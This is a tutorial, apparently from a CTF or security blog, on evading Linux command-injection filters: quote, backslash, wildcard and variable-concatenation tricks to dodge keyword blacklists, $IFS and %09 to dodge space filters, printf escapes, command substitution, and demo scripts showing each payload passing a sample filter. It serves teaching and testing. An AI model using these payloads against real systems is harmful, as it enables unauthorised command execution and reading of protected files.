Linux Command Execution Bypass

1 Command execution bypass

1.1 Keyword Bypass

Keyword bypass applies when a blacklist of keywords has been set up to block certain commands or arguments on a host: the filter rejects the literal keyword, but the shell accepts many other spellings of the same command line.

For instance, if the cat command is filtered:

  • Substitute a command with similar functionality, such as tac, more, less, nl, tail, sort, strings, head, paste, od, or curl with a file:// URL (curl file:///path/to/flag.txt).

  • Break the keyword up with quotes, an empty command substitution or a backslash. The shell removes them before it looks up the command name, so every line below runs cat:

    c'at' flag.txt    # quote removal joins c and at
    c"at" flag.txt
    c``at flag.txt    # empty backquotes substitute nothing
    c\at flag.txt     # the backslash only escapes the a
    

Another example: when the keyword flag is filtered in file names:

  • Use inline execution: the inner ls lists the current directory and the outer cat prints the contents of every file it returns, so the file name is never typed.

    cat `ls`
    
  • Bypass by using wildcards. A pattern is expanded against the file system before the command runs, so the keyword never appears in the command line.

    # Print every file in the current directory
    cat *
    
    # ? matches exactly one character
    cat fl?g.txt
    
    # cat flag.txt (see the note below on patterns that match more than one binary)
    /bin/c?t flag.txt
    
    # Encode flag.txt with base64: /bin/base64 flag.txt
    /???/????64 ????.???
    
    # Compress flag.txt with bzip2: /usr/bin/bzip2 flag.txt
    # bzip2 is five characters, so four ? precede the 2; the output goes to
    # flag.txt.bz2 and the original is removed (add -k to keep it)
    /???/???/????2 ????.???
    

    Patterns are matched against the file system, never against PATH: a bare c?t is compared with the names in the current directory, not with /bin/cat, so give the absolute path when a command name contains a wildcard. Also check what a pattern expands to before relying on it (echo /bin/c?t), because a match is not necessarily unique: on a system that also has /bin/cut, /bin/c?t expands to /bin/cat /bin/cut and the line becomes cat /bin/cut flag.txt. A bracket expression such as /bin/c[a]t still hides the keyword but matches only cat.

  • Concatenation bypass

    Split the keyword across two shell variables and join them at expansion time; ; separates the assignments and the command on one line.

    # cat flag.txt
    a=fl;b=ag.txt;cat $a$b
    
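To see the filter these tricks defeat, here is an added example that is not part of the original page: a hypothetical substring blacklist of the kind described above, with the payloads from this section run through it. The filter, the helper names and the sample flag.txt are constructed for the demo, and it also prints what /bin/c?t actually expands to, which the examples above take for granted.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): a hypothetical keyword blacklist
# of the kind this section bypasses, with the payloads above run through it.
# The filter, the sample flag file and the helper names are constructed here.

workdir=$(mktemp -d)
printf 'FLAG{demo}\n' > "$workdir/flag.txt"   # constructed sample file

# Hypothetical filter: reject any input that contains a blacklisted substring.
# Returns 0 (blocked) or 1 (allowed).
blocked() {
    case "$1" in
        *cat*|*flag*) return 0 ;;
        *)            return 1 ;;
    esac
}

# Runs a payload the way a vulnerable backend would (eval in a shell) after the
# filter; prints BLOCKED if the filter catches it, otherwise the command output.
run_payload() {
    if blocked "$1"; then
        echo BLOCKED
    else
        ( cd "$workdir" && eval "$1" 2>/dev/null )
    fi
}

# Shows what a glob expands to before running it: /bin/c?t may match
# /bin/cut as well as /bin/cat, which would turn the line into cat /bin/cut ...
expand() { ( cd "$workdir" && eval "echo $1" ); }

# The literal command is blocked; every variant below still reads the flag.
run_payload 'cat flag.txt'                 # BLOCKED
run_payload "c'at' fl''ag.txt"             # quotes split both keywords
run_payload 'c\at fl\ag.txt'               # backslash escapes one letter
run_payload 'c"a"t `ls`'                   # inline execution, name never typed
run_payload 'c``at fl?g.txt'               # empty backquotes plus a ? wildcard
run_payload '/bin/c[a]t ????.???'          # bracket glob matches only cat
run_payload 'a=fl;b=ag.txt;c"at" $a$b'     # concatenation
expand '/bin/c?t'                          # check for ambiguity first
```

Every payload is a single string with no "cat" or "flag" substring, which is all the filter looks at; the shell reassembles the keyword only after the check has passed.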

1.2 Whitespace bypass

Whitespace bypass applies when the host filters the space character out of the input.

  • IFS bypass

    The bash shell has a variable called IFS (internal field separator) that it uses to split expanded text into words. By default it holds a space, a tab and a newline; when an unquoted expansion produces one of these characters, the shell splits the result there, which makes $IFS a substitute for a literal space.

    # IFS by default in zsh, tested on Arch Linux (\C-@ is zsh's notation for NUL)
    $ set | grep IFS
    IFS=$' \t\n\C-@'
    
    # IFS by default in bash, tested on Kali Linux
    $ set | grep IFS
    IFS=$' \t\n'
    

    IFS is assigned like any other variable (IFS=":"). As long as it still contains a space, tab or newline, which it does by default, expanding it yields a separator, so it can replace the filtered space. Redirection is another way to hand a file to a command with no space at all.

    cat${IFS}flag.txt   # braces terminate the variable name
    cat$IFS$9flag.txt   # $9 is an empty positional parameter; without it, $IFSflag is read as one variable name
    cat<flag.txt        # redirection: cat reads the file from stdin
    cat<>flag.txt       # same, with the file opened read-write
    
  • %20 %09 bypass

    When the input reaches the shell through a web layer that URL-decodes it, %20 decodes to a space and is caught by the same filter, but %09 decodes to a tab, which the shell also treats as a word separator and a space-only filter does not reject.

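The IFS, redirection and %09 variants above, run against a hypothetical filter that rejects the literal space character, as an added example that is not part of the original page. It includes the cat$IFSflag.txt mistake mentioned above and a minimal decoder for %09/%20 that stands in for the web layer; the helper names and the sample file are constructed for the demo.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): a hypothetical filter that
# rejects any literal space (0x20), with the whitespace bypasses run against it.

workdir=$(mktemp -d)
printf 'FLAG{demo}\n' > "$workdir/flag.txt"   # constructed sample file

# Hypothetical filter: the payload is run only if it contains no space
# character. Prints BLOCKED or the command output.
run_nospace() {
    case "$1" in
        *' '*) echo BLOCKED ;;
        *)     ( cd "$workdir" && eval "$1" 2>/dev/null ) ;;
    esac
}

# Stand-in for the URL-decoding web layer: only %09 (tab) and %20 (space) are
# decoded, via octal escapes so that printf %b works in bash and POSIX sh alike.
urldecode_ws() {
    printf '%b' "$(printf '%s' "$1" | sed -e 's/%09/\\011/g' -e 's/%20/\\040/g')"
}

run_nospace 'cat flag.txt'         # BLOCKED: contains a literal space
run_nospace 'cat${IFS}flag.txt'    # FLAG{demo}: IFS expands to a separator
run_nospace 'cat$IFS$9flag.txt'    # FLAG{demo}: empty $9 terminates the name
run_nospace 'cat$IFSflag.txt'      # no output: the shell looks up $IFSflag, runs "cat.txt"
run_nospace 'cat<flag.txt'         # FLAG{demo}: redirection needs no space
run_nospace 'cat<>flag.txt'        # FLAG{demo}: read-write redirection
run_nospace "$(urldecode_ws 'cat%09flag.txt')"   # FLAG{demo}: a tab separates the words
run_nospace "$(urldecode_ws 'cat%20flag.txt')"   # BLOCKED: %20 is a space again
```

The cat$IFSflag.txt line is the usual failure: variable names may contain letters, so the shell reads IFSflag as one name, expands it to nothing and tries to run cat.txt. The braces or the empty $9 exist only to stop the name at IFS.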
2 Other useful tools for command execution

2.1 printf

The shell builtin printf converts octal, hexadecimal or Unicode escape sequences in its format string into the corresponding characters, so a blocked word can be produced without ever appearing literally.

printf  format-string  [arguments...]

\NNN: the character whose ASCII code is the octal number NNN. \xHH: the character whose code is the hexadecimal number HH. \uHHHH: the Unicode character U+HHHH. The octal form is POSIX; \x is a bash extension and \u requires bash 4.2 or later.

2.2 $() and backquotes

In bash, $( ) and backquotes (` `) perform command substitution: the command inside is executed first, its output replaces the substitution in the command line, and the shell then runs the resulting line. It is similar to variable substitution, except that the value comes from a command rather than a variable.

$ echo today is $(date "+%Y-%m-%d")
today is 2023-06-30

2.3 exec

In the shell, exec replaces the current shell process with the given command: no new process is forked, the PID stays the same, and when that command exits there is no shell to return to. In WSL, for example, exec ls replaces the shell of the WSL session with ls; ls prints its output and exits, the session ends, and you are back at the Windows terminal.

$ exec ls
code  project
PS C:\windows\system32> # the WSL shell process was replaced by ls, which has exited, so control returns to the Windows terminal

In the same way, exec on Linux can switch shells in place. A similar operation is used for privilege escalation in penetration testing. See future articles for more on privilege escalation.

# Replace the running zsh process with /bin/bash (the PID is unchanged)
# Note: $SHELL is inherited from the environment and normally names the login
# shell, so it does not always change after exec; echo $0 or ps -p $$ shows
# the shell that is actually running.
➜  ~ echo $SHELL
/bin/zsh
➜  ~ exec /bin/bash
[root@bowendelg ~]#
[root@bowendelg ~]# echo $SHELL
/bin/bash
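
To make the replacement visible, here is an added example that is not part of the original page: a child shell prints its PID, execs another shell that prints its PID again, and a command placed after the exec never runs. Function names are assumptions made for the demo.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): show that exec replaces the
# calling shell in place instead of forking a child.

# Runs a child shell that prints its PID, then execs another shell that prints
# its own PID. Because exec replaces the process, both lines carry the same PID
# and the trailing echo is never reached.
exec_trace() {
    sh -c 'echo "before $$"; exec sh -c "echo \"after \$\$\""; echo "never printed"'
}

# Returns 0 when the PID before and after exec is the same, 1 otherwise.
exec_replaces_process() {
    out=$(exec_trace)
    before=$(printf '%s\n' "$out" | sed -n 's/^before //p')
    after=$(printf '%s\n' "$out" | sed -n 's/^after //p')
    [ -n "$before" ] && [ "$before" = "$after" ]
}

# Number of lines exec_trace prints: 2, since nothing after exec runs.
exec_trace_lines() { exec_trace | wc -l | tr -d ' '; }

exec_trace
exec_replaces_process && echo "same process before and after exec"
```

This is the property the WSL example above relies on: once ls replaces the shell, nothing is left to receive control, so the session ends when ls exits.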